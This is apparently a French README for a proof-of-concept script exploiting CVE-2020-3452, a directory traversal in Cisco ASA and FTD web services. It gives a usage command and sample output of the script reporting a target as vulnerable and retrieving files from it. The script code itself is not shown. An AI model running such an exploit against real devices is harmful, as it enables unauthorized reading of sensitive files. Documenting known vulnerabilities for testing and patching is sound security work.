
CVE-2020-3452 - Traversée du logiciel Cisco Adaptive Security Appliance (ASA) et de Cisco Firepower Threat Defense (FTD)
Utilisation : CVE-2020-3452.py https://target
Description de la vulnérabilité : Une vulnérabilité dans l'interface des services web des logiciels Cisco Adaptive Security Appliance (ASA) et Cisco Firepower Threat Defense (FTD) pourrait permettre à un attaquant distant non authentifié de mener des attaques de traversée de répertoire et de lire des fichiers sensibles sur un système ciblé.
Exemple de sortie :
➜ Cisco-ASA-FTD-Web-Services-Traversal git:(main) ✗ python CVE-2020-3452.py https://target
+-------------------------------------------------------------+
- [ Cisco ASA / FTD Web Services Traversal Vulnerability ]
- -[ CVE-2020-3452 - PoC by: LiquidSky ^_^ ]-
+-------------------------------------------------------------+
[*] Checking potential target : https://target
[+] https://target is vulnerable...
[+] Grabbing logo.gif from the host.
[+] https://target is vulnerable...
[+] Grabbing http_auth.html from the host.
[+] https://target is vulnerable...